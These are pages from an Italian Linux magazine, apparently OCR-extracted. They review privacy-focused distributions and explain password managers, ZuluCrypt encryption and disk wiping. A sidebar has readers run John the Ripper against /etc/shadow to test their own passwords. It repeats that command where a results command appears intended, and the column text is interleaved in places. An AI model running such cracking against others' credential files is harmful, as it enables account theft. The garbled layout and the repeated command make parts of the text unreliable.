Quanto potete dormire sonni tranquilli con queste distro? Verdetto

A
nche se la caratteristica più
importante di Tails è la sua
amnesia in modalità Live,
è possibile installarlo su disco rigido
e utilizzarlo come qualsiasi altra distro
Linux. Tra i vari vantaggi che si possono
notare, ce n’è uno molto interessante.
I dati contenuti nella RAM, infatti,
verranno cancellati a ogni arresto del
sistema. In questo modo, siete protetti
anche dalle più recenti tecniche forensi
per il recupero delle informazioni.
Ubuntu Privacy Remix è un’altra distro
JonDo Live
che nella protezione dei dati personali vi consigliamo di utilizzare la crittografia
HHHHH
brilla molto più di altre. Infatti, non c’è e proteggere il tutto con una password Qubes OS
assolutamente alcuna possibilità che molto robusta. Qubes OS si comporta HHHHH
le vostre informazioni vengano lasciate molto meglio, in quanto permette di Ubuntu
accidentalmente sul disco. L’unico isolare i dati sensibili in un dominio o in Privacy Remix
HHHHH
modo per mantenerle è utilizzare un’AppVM separata senza accesso alla Tails
i volumi di TrueCrypt che peraltro rete. Se però il malintenzionato di turno HHHHH
possono essere memorizzati solo su si dimostra particolarmente abile, Whonix
supporti USB rimovibili. Whonix è molto riuscirà ugualmente a mettere mano HHHHH
meno potente sotto questo punto di alle informazioni in questione. JonDo, UPR è il più
vista. I dati, infatti, possono comunque infine, utilizza un sistema persistente sicuro per la
protezione dei
essere memorizzati e rimanere piuttosto facile da usare. Sfrutta poi vostri dati.
a disposizione dei più curiosi. Per questo LUKS per la crittografia delle unità USB.

42
 Distribuzioni blindate Confronto
Sicurezza e privacy a 360°
Ubuntu Privacy Remix  HHHHH
Triste, ma vero, Ubuntu Privacy Remix non ha funzionalità di rete.
Il kernel di sistema viene modificato in modo da ignorare qualsiasi
hardware di questo tipo, rendendo UPR un sistema perfettamente
isolato che non può essere attaccano via LAN, WLAN, Bluetooth,
Infrarossi e via dicendo. In altre parole, non potete navigare sul Web
e quindi avere a che fare con trojan, cookie, servizi remoti o Cloud. Quasi
tutte le tracce di connettività vengono spazzate via, anche se alcune
sono ancora presenti. Per esempio, ifconfig e ifup/ifdown figurano tra
i comandi disponibili, sebbene siano del tutto inutili visto che l’hardware
di rete è disabilitato. In questo test, UPR può essere valutato solo
in modo negativo, a meno di non fare a meno del collegamento al Web.

Tails  HHHHH
Tails include funzioni di rete di alto livello, tra cui la più importante
è senza dubbio Tor. Per chi non lo sapesse, si tratta di una rete aperta di
server anonimi che tenta di evitare l’identificazione e l’analisi del traffico.
Tor è accompagnato da Vidalia, un front-end di facile configurazione
che possiede anche un browser preconfigurato basato su Firefox ESR.
Questo è poi dotato di un pulsante per attivare Tor e il supporto per le
estensioni HTTPS Everywhere, NoScript e AdBlock Plus Il. Tra i tanti
extra che Tails mette a disposizione, troviamo l’anonimizzante I2P
e un proxy più un front-end VPN. Ci sono anche una tastiera virtuale
e applicazioni come AppArmor, PWGen, KeePassX, AirCrackNG e altre.

Whonix  HHHHH
Whonix basa molte delle sue peculiarità su Tor, condividendo poi altri
strumenti di terze parti con Tails. Ci sono però alcune differenze.
La prima riguarda il funzionamento di Tor che, in questo caso, gira
su Whonix-Gateway, così da fornire una migliore protezione contro
il rilevamento degli IP e la geolocalizzazione. Il livello di sicurezza degli
IP e dei DNS è di alto profilo, in più abbiamo una gestione di questi
elementi estremamente solida, tanto da non dar luogo a perdita
di connessione o instabilità. Per esempio, anche se la workstation
fosse compromessa (qualcuno potrebbe essere riuscito ad accedere
come root), sarebbe comunque impossibile scoprire l’IP reale. Infatti,
isolare il server proxy all’interno di una macchina virtuale
indipendente funziona perfettamente.

Prestazioni
Quanto sono veloci nell’attività quotidiana? Verdetto

L
a versione più recente di Tails
utilizza il kernel 3.16.7 e sfrutta
Gnome Shell 3.4 in modalità
fallback per impostazione predefinita.
Il desktop è molto leggero, veloce quasi
quanto Gnome 2 delle precedenti
release. I requisiti ufficiali di sistema
evidenziano però la necessità di almeno
1 GB di RAM per funzionare senza
problemi. Un valore a nostro avviso
troppo elevato. Ubuntu Privacy Remix
è stato aggiornato per utilizzare Ubuntu
12.04 LTS e ha quindi molte backports
JonDo Live
e caratteristiche moderne. Nonostante perché avrete bisogno di risorse
HHHHH
questo è piuttosto leggero. UPR utilizza sufficienti per eseguire due macchine Qubes OS
un classico desktop Gnome 2 che viene Virtualbox contemporaneamente. HHHHH
caricato in un paio di secondi. Per la Il sistema operativo è configurabile, Ubuntu
nostra esperienza, pensiamo che 512 ma sulla macchina base dovrete avere Privacy Remix
HHHHH
MB di RAM siano più che sufficienti almeno 4 GB di RAM e 12 GB di spazio Tails
per far girare discretamente il sistema. su disco. Tuttavia, SSD e CPU con HHHHH
JonDo, grazie al desktop XFCE, si avvia supporto di virtualizzazione hardware Whonix
anche in presenza di processori molti sono le benvenute. Per Qubes OS HHHHH
vecchi. Tuttavia, è necessario disporre è necessaria una macchina potente: Tails e JonDo
di almeno 1 GB di RAM per non avere processore a 64-bit, 4 GB di RAM funzionano
anche con
problemi con l’applicazione JonDo IP e almeno 32 GB di spazio per la risorse risicate.
basata su Java. Whonix è diverso, partizione root.

43
Confronto Distribuzioni blindate
Protezione Generale
Usabilità desktop
Potete rimanere anonimi e usare le funzionalità desktop?
S
ebbene Tails includa un
programma d’installazione che
può creare una partizione sulla
stessa periferica USB, l’esperienza
migliore rimane in modalità Live.
Con questa distro potete sfruttare una
grande quantità di programmi, come
LibreOffice, Gimp, Audacity, Sound
Il desktop di Tails rappresenta un ambiente familiare per tutti gli utenti Gnome
Documentazione e supporto
Se avete bisogno di aiuto, a chi vi rivolgete?
L
a documentazione online, la
presenza di wiki e FAQ sono
fondamentali per qualsiasi
software e ancor di più per le distro
anonimizzanti. Tails offre una buona
base di documenti per l’utente finale
che approfondisce aspetti di carattere
generale: i primi passi, le domande
frequenti, le spiegazioni di funzioni
dettagliate e molto altro ancora.
La documentazione è completa
e prende in considerazione aspetti che
non riguardano soltanto la distro in sé,
ma anche i programmi annessi.
Volendo, si può sfruttare una chat di
assistenza, corredata da un modulo per
la richiesta di informazioni. Ubuntu
Privacy Remix ha un sito ordinato
e compatto, ma purtroppo con poco
materiale a disposizione. Potete trovare
alcune utili guide how-to, come le
44
Juicer e molti altri. JonDo è altrettanto
usabile, soprattutto grazie al suo
desktop XFCE. Ricco di funzioni
e software, ha il suo principale
vantaggio in JonDo IP e nel browser
JonDoFox che peraltro sono disponibili
per l’installazione su qualsiasi distro
Linux. Ubuntu Privacy Remix include
istruzioni per la creazione di
una build URP personale
(con un set di software
personalizzati). Whonix,
invece, mette a disposizione
la sua documentazione
nel portale wiki dedicato.
Consultandola, ne abbiamo
apprezzato la completezza La sezione d’aiuto di Whonix è davvero
garantita da articoli e opzioni completa e offre tutto quello di cui si ha bisogno
di supporto con tanto di
forum molto attivo. Anche il progetto
Qubes OS dispone di un portale wiki
con vari articoli base e avanzati.
L’architettura del sistema è spiegata nel
dettaglio e troviamo anche una nutrita
schiera di FAQ valide un po’ per tutte
le esigenze. Non mancano poi
documentazione e tutorial per l’utente
finale. Qubes, inoltre, ha molte funzioni
extra che vengono anch’esse prese in
solo Gnome 2 e una manciata di
accessori, così come poche applicazioni
desktop (Scribus e LibreOffice).
L’esperienza d’uso è comunque
piuttosto scarsa. L’aspetto peggiore
è che URP non è flessibile e quindi non
potete configurarlo per migliorare la
situazione. Entrambe le macchine
Whonix usano desktop KDE su Debian
che sul lato Gateway si rivela un po’
eccessivo. L’utilizzo della Workstation
è però appagante e si è rivelato molto
comodo. A parte alcuni rallentamenti Verdetto
e restrizioni causate dal firewall, Whonix
JonDo Live
Workstation può essere sfruttato HHHHH
tranquillamente come piattaforma Qubes OS
desktop per l’uso quotidiano. Qubes OS, HHHHH
invece, fornisce un’esperienza Ubuntu
Privacy Remix
completamente diversa. È facile
HHHHH
da installare, ma tende a funzionare Tails
piuttosto lentamente su tutta la linea HHHHH
d’azione. Il desktop KDE è sì intuitivo, Whonix
ma l’interazione dei domini richiede HHHHH
comunque un bagaglio di esperienze JonDo e UPR
si usano anche
superiori. Per esempio, la copia e la per le attività
condivisione di file da un dominio quotidiane.
a un’AppVM è tutt’altro che semplice.
Verdetto
JonDo Live
HHHHH
Qubes OS
HHHHH
considerazione nel manuale d’uso. Ubuntu
JonDo non è da meno e mette Privacy Remix
HHHHH
a disposizione guide, FAQ, tutorial, Tails
un portale wiki e un forum. Anche HHHHH
se a un primo sguardo il tutto può Whonix
sembrare completo, approfondendo HHHHH
un po’ il valore del materiale non si può Whonix ha
fare a meno di trovare delle lacune. tutto quello
che si può
Le FAQ, per esempio, sono poche desiderare.
e la wiki molto piccola.
 Distribuzioni blindate Confronto
Sicurezza e privacy a 360°

Distribuzioni blindate

Il verdetto
J
ava Anon Proxy è stato lanciato nel
2007, sostenuto da un efficace e
duro lavoro di ricerca. Guardando
JonDo Live-DVD si può coglierne
l’essenza, tanto da superare Tails,
l’ex re dell’accesso anonimo a Internet.
Entrambi i progetti sono di alta qualità,
ma il primo ha caratteristiche
sicuramente più equilibrate e può
contare su uno sviluppo maggiormente
attivo. È difficile disquisire sul fatto che
Tor sia in grado o meno di fornire un
perfetto accesso anonimo al Web, ma
il fatto che sia tecnicamente possibile
individuare un utente attraverso un nodo
compromesso è un dato di fatto. Da tale
punto di vista, la selezione dei nodi
da parte di JonDo è però molto meno
casuale rispetto a Tor e non sappiamo
quanto realmente ci si possa fidare di
questo approccio. Entrambe le soluzioni
rallentano molto la velocità Internet e il
1° JonDo Live-DVD  HHHHH
Web: http://bit.ly/JonDoLive-DVD Licenza: BSD Versione: 0.9.78
Veloce, portatile e facile da utilizzare. Non si può chiedere di più.
sistema a cascata di JonDo sembra
essere ancora più lento della
concatenazione dei nodi di Tor. Tuttavia la
velocità di navigazione non è un priorità JonDoFox
assoluta, soprattutto quando si vuole convenzionale. Stiamo sempre parlando non permette
massimizzare l’anonimato. Gli altri di anonimato, ma si tratta anche di un di navigare in
partecipanti a questo confronto sistema diverso dagli altri. Il sito Web Internet a meno
richiedono però di sopportare ben altri del progetto mostra come sia possibile di non attivare
compromessi. Whonix, per esempio, creare una propria spin-off di UPR Java Anon Proxy
costringe a usare macchine virtuali che e usarlo come sistema isolato che non
sono sempre più lente di un PC host. lascia tracce sul PC, ma dall’altra parte
Qubes OS, pur fornendo un ottimo livello non ha nessun supporto per le attività
di anonimato, è una distro pesante da di rete. Un aspetto, questo, che se da un
utilizzare. Il suo scopo è comunque fare lato contribuisce a mantenere il massimo
in modo di isolare i vari segmenti, così livello di sicurezza, al giorno d’oggi
che ciascuno di essi sia compartimentato è anche piuttosto limitante.
e non raggiungibile
anche in caso di
compromissione del
“JonDo Live-DVD riesce
singolo. L’approccio di
Ubuntu Privacy Remix
a superare senza difficoltà Tails,
è invece poco l’ex re delle distro anonime”
4° Qubes OS  HHHHH
Web: https://qubes-os.org Licenza: principalmente GNU GPL Versione: R3
Molto sicura, ma ha richieste hardware davvero troppo esose.

2° Tails  HHHHH 5° UPR  HHHHH

Web: https://tails.boum.org Licenza: GNU GPLv3 Versione: 1.3.2 Web: www.privacy-cd.org Licenza: principalmente GNU GPL Versione: 12.04r1
Equilibrato e con una connessione a Internet sicura. Consideratela una distro speciale per la protezione dei dati personali.

3° Whonix  HHHHH A voi la parola...

Web: www.whonix.org Licenza: principalmente GNU GPL Versione: 10.0.0.5.5 Non siete d’accordo con le nostre scelte? Avreste usato altre distro?
Molto flessibile e sicuro, ma le specifiche hardware sono troppo alte. Inviate le vostre opinioni su questo confronto a: recensioni@linuxpro.it

Considerate anche...
Molte persone sono erroneamente convinte
di essere del tutto invisibili all’interno di una
rete Tor. Ci dispiace deluderle ma purtroppo
non è così. Infatti, seppure si possa godere
di un buon livello di anonimato, nel momento
in cui si infrange la legge e si attira
l’attenzione dei servizi di intelligence, non c’è
Tor che tenga. Per questo, ma anche per una
questione morale, vi chiediamo di usare
l’anonimato solo per scopi legali. A questo
proposito, la scelta delle distro che
proteggono la vostra privacy è molto più
ampia di quella che qui abbiamo fornito.
Ci sono progetti come IprediaOS, Polippix
e Mandragora che pur non adattandosi
a questo confronto, vale comunque la pena
di prendere in considerazione per una prova.
In realtà, poi, qualsiasi distro può essere
configurata per raggiungere un alto livello
di anonimato, basta usare gli strumenti giusti
messi a disposizione dalla Rete.

45
 Protezione Generale

Password blindate
Chiavi di accesso dimenticate o segnate su post-it volanti attaccati
al monitor? Ecco un approccio molto più pratico e sicuro

O
vunque andate, avrete bisogno di password. Infatti,
il numero di siti Web che richiede un accesso sicuro
è di gran lunga superiore alla maggior parte delle pagine
senza richiesta di login. A fine giornata, non è inusuale avere
inserito almeno una decina di dati di accesso diversi su più
piattaforme. Ricordare tutto a mente è praticamente impossibile
e segnare le credenziali su carta, per quanto possa essere comodo,
non è certamente una delle soluzioni più sicure. Abbiamo quindi
deciso di fornirvi un’alternativa che darà risposta a tre domande:
come scegliere le password, come essere sicuri che siano a prova
di hacker e come ricordarle senza fare uso della carta.

Le chiavi del regno

Parlare di password è sempre un argomento molto delicato.
Ognuno ha il suo metodo per sceglierle e spesso si tratta
di un sistema poco sicuro, che chiunque con un minimo
di esperienza informatica può scoprire. Per questo è necessario
partire dal presupposto che prevenire è meglio che curare.
Infatti, scegliere una chiave di accesso è fondamentale. In primo
luogo fate affidamento su combinazioni da 8 a 15 caratteri
alfanumerici scelti casualmente, con maiuscole, minuscole
e simboli. In seconda istanza, dovete inquadrare le criticità, vale
a dire quei servizi che più di ogni altro sono fondamentali
per la vostra privacy, quindi proteggerli con cura. Il più importante
è la posta elettronica. Se qualcuno dovesse scoprire la password
per accedere ai vostri messaggi, probabilmente verrebbe
a conoscenza di una buona parte della vostra vita privata
e professionale. Senza poi contare il pericolo di rendere note
molte altre password di servizi cui avete richiesto il reset dei dati
di accesso. Infatti, in questo caso, ci viene quasi sempre inviata
un’email con le nuove credenziali, che ancora più spesso
non provvediamo a modificare una volta utilizzate. Un potenziale
malintenzionato che venga a conoscenza di queste informazioni,
potrà fare non pochi danni.
Memorizzare la password
A fronte della complessità delle password che utilizzate,
la necessità di ricordarle senza usare mezzi fisici, come appunto
la carta, è fondamentale. Una soluzione è affidarsi a un gestore
di password. La maggior parte dei browser offre la possibilità
di salvare le chiavi di accesso, così come gli ambienti desktop
che possono sfruttare applicazioni come Gnome Keyring e KDE
Wallet. A proposito di questi, però, c’è da dire che non sono
sistemi universali e portatili. Si potrebbe ovviare utilizzando
LastPass (http://lastpass.com), che memorizza le password
e ha estensioni per i browser più conosciuti, obbligandoci poi
a ricordare una sola chiave principale. Strumenti come questo,
però, hanno un paio di difetti da sottolineare: il primo è che
possono limitare l’uso del Web; il secondo, invece, riguarda
la necessità di affidare le vostre password a servizi di terze parti.
Infatti, pur memorizzando le chiavi cifrate, lo fanno con la propria
crittografia e non con la vostra. Pertanto sono potenzialmente
suscettibili di violazioni della sicurezza. Un’altra opzione
è effettivamente archiviare il proprio database delle chiavi
di accesso utilizzando un programma come KeePassX,
disponibile per Linux, Windows, Mac OS, Android e iOS.
Ogni versione utilizza lo stesso formato di archiviazione,
consentendo di condividere il database con tutti i dispositivi cui
avete accesso, soprattutto se lo tenete su uno spazio Cloud.

I pregi della carta
Seppure nel nostro articolo abbiamo
parlato di come esistano sistemi migliori
del classico foglio di carta per
la memorizzazione delle password,
non possiamo esimerci dal cantarne anche
le lodi. Infatti, un’agendina chiusa a chiave
in una cassaforte o in qualche altro luogo
sicuro non può essere trafugata facilmente
né da un comune ladro, né tantomeno
da un hacker. Le password, non essendo
memorizzate sul PC, non possono essere
scoperte con i tradizionali sistemi
di hacking. In più, potrete lasciarle a una
persona di fiducia nel caso ne abbiate
bisogno. Insomma, anche se ne
sconsigliamo l’uso come fonte principale,
la carta non va certo demonizzata
ed è un ottimo sistema per mantenere
il backup delle credenziali d’accesso. Basta
ricordarsi di aggiornarlo spesso.
Scegliere bene
Una password facile da decifrare è inutile, ma lo è anche
una troppo complessa da non essere ricordata. Se utilizzate
un gestore di chiavi di accesso, molto probabilmente avrete
la possibilità di generare password lunghe, casuali, criptiche
e via dicendo, ma avrete comunque bisogno di crearne
una master davvero sicura. Qualsiasi password non memorizzata
in un database deve essere facile da ricordare, ma difficile
da indovinare. A questo proposito, ci sono una serie di fattori
che ne influenzano la sicurezza. Utilizzando le parole di senso
compiuto (comunemente dette “da dizionario”),
che comprendono nomi propri, di luogo o comuni, si genera
una chiave facile da indovinare. Anche il numero di caratteri

46
 Password a prova di bomba

Mettete a dura prova le password

Come si fa a sapere se una password è davvero
buona oppure debole? Ci sono una serie di siti
che fanno al caso nostro e permettono di mettere
a dura prova la resistenza di qualsiasi chiave
di accesso. Uno dei più famosi è https://
howsecureismypassword.net. Ovviamente non
è il caso di dare in pasto a questi servizi la vera
password che utilizzerete, ma potete crearne una
con le stesse caratteristiche, così da fargli valutare
lo standard che sfruttate. Un’altra alternativa è John
the Ripper (www.openwall.com/john),
un programma che tenterà di infrangere la chiave
di accesso della vostra distro. è un’applicazione
a riga di comando, che deve essere eseguita come
root. Lanciate l’istruzione
sudo john /etc/shadow
che tenterà di forzare le credenziali del sistema.
Se desiderate controllare un’altra password, basta
cambiare quella di amministrazione, quindi eseguire
il comando suggerito poco sopra. Potete visualizzare
il cracking della chiave con il comando
sudo john /etc/shadow
John, infine, mantiene un elenco delle password
che è riuscito a scoprire.

Il sito How Secure is my Password vi permette di valutare

la resistenza delle vostre chiavi di accesso
Un’alternativa
e la loro scelta incidono particolarmente sulla sicurezza di una elementi automaticamente. In questo modo, avrete accesso online a KeePassX
password, ed è per questo che si raccomanda di scegliere ai vostri siti in modo molto più veloce e pratico. Potete è LastPass,
una combinazione alfanumerica con maiuscole, minuscole poi generare le chiavi per ogni sito, quindi scegliere quella che si occuperà
e simboli. Tuttavia, questi possono rendere la chiave molto più che reputate più affidabile. Il database è contenuto in un singolo per voi delle
difficile da ricordare, per non parlare della complessità nel doverla file, di cui dovrete avere estrema cura, mantenendone una copia password
scrivere su una tastiera touchscreen. Pertanto, come facciamo in un posto sicuro.
a creare una password abbastanza lunga per essere sicura,
che non sia una parola dal senso compiuto e che si possa scrivere
agilmente su qualsiasi dispositivo? Una delle risposte più ovvie
è creare una chiave poco sicura. Chiedere a qualcuno di ricordare
una password di 24 caratteri è pura follia, ma se provate a fargli
la stessa domanda diminuendo il numero dei fattori a quattro
o sei lettere, allora avrete la vostra risposta. Tutto ciò che dovete
ricordare è l’ordine delle quattro parole. Potete poi fare alcune
modifiche, come utilizzare i numeri al posto delle lettere, oppure
generando errori ortografici intenzionali. In questo modo si crea
una password più sicura, a patto che le parole scelte siano
sconosciute agli altri tranne che a noi. La cosa più importante,
poi, è che non dovrete scrivere alcunché. KeePassX utilizza
un database crittografato per memorizzare gli URL, i nomi degli
account e le password. Ci sono versioni disponibili per sistemi
operativi desktop e mobili, in modo da mantenere un unico
database ovunque. Esiste anche una release portatile per
Windows, che potete sistemare in una chiave USB con il relativo
database. Questa applicazione, però, fa molto di più
che memorizzare le password; infatti, le può inserire nel browser
per voi. L’impostazione predefinita prevede di aggiungere
singolarmente username e chiave di accesso, ma la seconda KeePassX vi permette di avere una password lunga
versione del programma permette di inserire almeno due e complessa come uno script Perl senza doverla ricordare

47
 Dischi e Dati
ZuluCrypt:
Drive cifrati
Ecco un metodo nuovo per nascondere i vostri dati
A
nche se potete controllare l’accesso ai dati
del vostro computer con gli account utente
e i permessi, tutto ciò non basta per evitare che un
intruso riesca ad accedere ai vostri file privati. L’unico modo
per tenerli al sicuro è la cifratura. È vero che lavorare con
dati cifrati è un sistema scomodo, tuttavia è utilissimo
per migliorare la vostra sicurezza e nascondere le vostre
informazioni. ZuluCrypt è un’applicazione grafica
di cifratura che ha un’interfaccia intuitiva e facile da usare.
Grazie a essa potrete creare un disco cifrato all’interno
di un file, di una partizione e anche di un disco USB. Potrete
perfino usarla per cifrare singoli file con GPG. Per installare
ZuluCrypt andate all’indirizzo http://mhogomchungu.
github.io/zuluCrypt e scorrete in basso la pagina fino alla
sezione dei pacchetti binari. L’applicazione è disponibile
come pacchetto di file Deb per Debian e Ubuntu. Scaricate
quello della vostra distro e decomprimetelo con tar xf
zuluCrypt*.tar.xz. Nella cartella estratta, aprite quella
corrispondente all’architettura del vostro computer (i386
per macchine a 32 bit e amd64 per quelle a 64 bit).
Entrambe le cartelle contengono quattro pacchetti binari
che potete installare in un colpo solo con il comando sudo
dpkg -i *deb. In altre distro dovrete installare ZuluCrypt
manualmente. Scaricate l’archivio dell’applicazione
e seguite i passi dettagliati del file build-instructions per
recuperare le dipendenze dai repository della vostra distro.
Una delle prime cose da fare dopo l’installazione è creare
versioni cifrate di tutti i file che ritenete sensibili. Lanciate
l’applicazione e andate a zC -> Encrypt A File. Nella
finestra di dialogo che appare, premete sul pulsante accanto
al campo Source e trovate il file che volete cifrare. ZuluCrypt
userà questa informazione per creare un file con lo stesso
ZuluCrypt
supporta anche
la cifratura
a cascata
che è il processo
per cifrare
un messaggio già
cifrato, usando
lo stesso
algoritmo
o uno diverso
48
nome a cui aggiungerà l’estensione zC. Potete anche
salvarlo altrove, facendo click sull’icona a forma di cartella
accanto al campo Destination e selezionando la nuova
destinazione. Poi nel campo key scrivete la password per
cifrare il file. Assicuratevi che sia composta da lettere e
numeri per renderla più difficile da scoprire. Inoltre ricordate
che non c’è modo di recuperare la password se ve la
dimenticate e che non c’è possibilità di decifrare il file, che è
proprio lo scopo dell’applicazione! Dopo aver confermato la
password, premete sul pulsante Create per cifrare il file. Il
processo può durare un po’ di tempo, in base al tipo di file
che state cifrando e alle sue dimensioni. Una volta finito,
avrete la versione cifrata con l’estensione .zC nella cartella
di destinazione che avete scelto. Cifrato un file, cancellatene
la versione originale. Prima di leggerlo e poterlo modificare,
dovrete decifrarlo. Per farlo, avviate ZuluCrypt e andate a zC
D Decrypt A File. Indicate il file cifrato nel campo Source
e cambiate la posizione del file sbloccato nel campo
Destination. Poi scrivete la password con la quale avete
cifrato il file e fate click sul pulsante Create. Quando
l’operazione è finita, il file decifrato verrà creato nella
destinazione indicata. Per cifrarlo un’altra volta, seguite
la procedura che abbiamo appena visto.
Contenitori di file cifrati
Cifrare un file alla volta va bene se ne abbiamo giusto
un paio. In generale si tratta di una procedura scomoda
adatta a quei file che non abbiamo bisogno di leggere
o di modificare regolarmente. Se invece vogliamo
proteggere un certo numero di file a cui accediamo di
frequente, è molto meglio metterli in aree cifrate. ZuluCrypt
può cifrare interi dispositivi a blocchi, cioè cifrare tutto ciò
che contengono. Questi dispositivi possono essere un disco
fisso, una sua partizione o anche un file montato come
dispositivo di loopback. Con la cifratura dei dispositivi
a blocchi, l’utente crea il filesystem sul dispositivo, e il livello
di cifratura cifra i dati in modo trasparente prima di scriverli
nel dispositivo a blocchi sottostante. Quando vengono
cifrate, le aree di archiviazione appaiono come un insieme
confuso di dati e non mostrano nemmeno la struttura
in cartelle. Per creare un dispositivo di archiviazione cifrato
all’interno di un file, avviate ZuluCrypt e andate a Create D
Encrypted Container In A File. Nella finestra che si apre
dovrete inserire il nome e completare il percorso della
cartella in cui nascondere i vostri dati sensibili. Viene

Non potete sbloccare un volume senza un header.
Se l’originale si rovina, create un backup con un click destro
su un volume montato e scegliete l’opzione appropriata
chiamato file, perché quando viene cifrato, appare proprio
come un singolo file. Dovrete anche indicare le dimensioni
della cartella in base a quelle dei file che conterrà e lo spazio
disponibile sul disco. Quando premete sul pulsante Create,
ZuluCrypt mostra un’altra finestra. Per prima cosa dovrete
scrivere una password per cifrare il file. Poi dovrete scegliere
un tipo di Volume. L’opzione predefinita è LUKS, o Linux
Unified Key Setup, che è un tipo di cifratura creata in modo
specifico per Linux. Oltre a LUKS, ZuluCrypt può anche
creare e aprire volumi TrueCrypt, VeraCrypt e Plain. Questi
ultimi sono volumi cifrati senza header e l’informazione
di cifratura viene fornita da ZuluCrypt. Proprio per questo,
i volumi Plain dipendono dall’applicazione e non sono molto
portatili. I volumi TrueCrypt o VeraCrypt sono alternative
migliori, se il volume cifrato va condiviso tra computer con
Linux, Windows e OS X. Una volta deciso il tipo di Volume,
dovrete scegliere un codice, un algoritmo che esegua
la cifratura e la decifratura vere e proprie. Un attributo
del codice è la dimensione associata della chiave.
Con l’aumentare delle dimensioni della chiave, aumenta
anche la complessità della ricerca, fino al punto in cui
diventa impossibile violare direttamente la cifratura.
Il codice di cifratura più popolare è l’Advanced Encryption
Standard (AES) che è basato sul codice Rijndael. Con una
chiave da 256 bit, l’AES è molto usato perché offre la giusta
proporzione tra velocità e sicurezza. Questo è il codice
predefinito di ZuluCrypt. Comunque l’applicazione ne
supporta tanti altri, compresi gli algoritmi Twofish
e Serpent. Lo US National Institute of Standards and
Technology ritiene che questi due abbiano un livello
di sucurezza maggiore dell’AES, ma sono più lenti. Potete
selezionare tranquillamente i valori predefiniti per ogni
campo, compreso il filesystem predefinito per il volume
(ext4) e fare click sul pulsante Create. Finita la procedura,
vedrete un file con il nome che avete indicato per
il contenitore cifrato, con il contenuto illeggibile e con
le dimensioni che avete specificato in precedenza. Prima
di archiviare file in questo volume cifrato, dovrete decifrarlo
e montarlo. Andate a Open -> PLAIN,LUKS,TrueCrypt
Container In A File. Usate il pulsante file nella finestra che
appare per trovare il file del contenitore cifrato che avete
appena creato. Volendo, potete cambiare il nome di mount
del file, oppure potete inserire la password e premere Open.
Mettete la spunta all’opzione, se volete solo leggere
i contenuti del volume cifrato. Dopo avere montato il volume,
apparirà nel vostro filesystem come qualsiasi altro
elemento. La finestra principale di ZuluCrypt mostrerà
il volume e il suo intero percorso. Ora potete creare cartelle
Criptazione dei documenti
e file nel dispositivo montato come fareste con qualsiasi
dispositivo normale. Quando avete finito, fate un click destro
sul volume montato nell’interfaccia di ZuluCrypt
e selezionate l’opzione Close. Così smonterete e cifrerete
il volume. Ancora una volta avrete solo il singolo file cifrato
dal contenuto illeggibile. Montate di nuovo il file seguendo
la procedura già vista per vedere cosa contiene. Se avete
problemi a gestire più password, ZuluCrypt vi dà la
possibilità di creare chiavi casuali per cifrare file e volumi.
Per generare una chiave andate a Create D Keyfile. Inserite
il nome della chiave e il suo percorso di archiviazione.
Dal punto di vista della sicurezza, non dovreste archiviare
le chiavi nello stesso disco fisso in cui ci sono i file o i volumi
cifrati. Infatti, è meglio tenerle su un altro dispositivo per
essere sicuri che i vostri dati cifrati restino al sicuro anche
se qualcuno si impossessa del drive che li contiene.
Per usare una chiave invece di una password, selezionate
l’opzione keyfile nel menu a tendina, quando create
un volume o un file cifrato. Selezionata questa opzione,
dovrete associare l’applicazione alla chiave, che verrà usata
per bloccare i vostri dati.
Codificare partizioni e dischi
Se volete cifrare un gran numero di dati, è meglio mettere
il contenitore cifrato all’interno di una propria partizione
oppure su un drive USB rimovibile. Notate che quando
create questo contenitore, ZuluCrypt si impossessa di tutta
la partizione o di tutto il disco, quindi assicuratevi di avere
fatto il backup dei dati presenti. Inoltre, assicuratevi che
la partizione di destinazione o il drive non sia montato. Usate
il comando mount per vedere tutte le partizioni montate.
Se la partizione che volete usare mostra /dev/sdb1,
significa che è montata e dovrete smontarla con sudo
umount /dev/sdb1. Ora avviate ZuluCrypt e andate a Create
D Encrypted Container In A Hard Drive. Nella finestra
che appare, ZuluCrypt elencherà tutte le partizioni
disponibili che può usare per archiviare il volume cifrato.
Notate che i dispositivi sono elencati sia per nome, sia
per l’UUID associato. Se state creando un contenitore
su un disco rimovibile, selezionate l’opzione Use UUID.
Così ZuluCrypt identificherà sempre il dispositivo giusto.
Fate un doppio click sul drive o sulla partizione in cui volete
creare il volume. Ora potete creare un volume cifrato nel
drive, usando la stessa procedura già vista in precedenza
per crearne uno cifrato in un file. Anche se all’inizio può
sembrare difficile da usare, non ci metterete molto ad
abituarvi a questa applicazione. Non c’è modo più facile per
chi tiene alla propria privacy per proteggere i propri dati.
ZuluCrypt ha anche lo strumento ZuluMount per montare tutti i volumi cifrati
che supporta, ma che serve anche come strumento generico di montaggio
49
 Dischi e Dati
Cancella i dischi
prima di venderli
Esploriamo le varie opzioni a vostra disposizione per assicurarvi che i
dati presenti nei vecchi hard disk non finiscano in mani sbagliate
S
tate per caso pensando di donare o vendere a
qualcuno il vostro vecchio PC? Prima di farlo dovete
pensare a una cosa: come ripulire del tutto (e in modo
sicuro) il disco fisso, per evitare che i vostri dati personali
finiscano sotto gli occhi di gente che non conoscete.
Secondo il NIST (National Institute of Standards and
Technology, www.nist.gov) ci sono tre livelli di sanificazione
(o cancellazione): clearing (pulizia), purging (eliminazione) e
destroying (distruzione). Il primo livello previene la possibilità
di recuperare i dati usando le normali utility per il ripristino
di dati, file o dischi. Eliminazione fa in modo che dei tecnici
di laboratorio, che usano particolari strumenti per
l’elaborazione dei segnali, non riescano comunque a
recuperare nulla. Distruzione, infine… beh, prevede la
distruzione fisica del disco che quindi non può più essere
usato. Per realizzare questo tutorial abbiamo impiegato sette
diversi metodi di cancellazione dei dati dal disco Seagate
5400.6 da 160 GB di un portatile: i tool standard rm, format
e shred; i programmi DBAN e Secure Erase; degaussing
(demagnetizzazione) con una macchina specializzata;
distruzione fisica. Non tutti hanno accesso a dei macchinari
che costano attorno ai 9.300 € o hanno voglia di prendere
a martellate il proprio hard disk, quindi, leggendo questo
articolo, potrete beneficiare dei nostri esperimenti senza
correre rischi! Potete leggere come abbiamo condotto i test
nel box della pagina a fianco (Procedura di test), mentre i
risultati sono riassunti nella tabella che vedete in questa
pagina. Come potete osservare, cinque dei sette metodi
forniscono diversi livelli di sanificazione. Quale adottare
dipende da caso a caso. Il comando shred, per esempio, fa sì
che i file diventino illeggibili, ma bisogna applicarlo
manualmente a ogni singolo file, il che lo rende improponibile
per ripulire un intero hard disk. All’altro estremo della scala, il
Tip degaussing e la distruzione rendono illeggibili i dischi fissi,
quindi non potete usare questi metodi se volete passare il
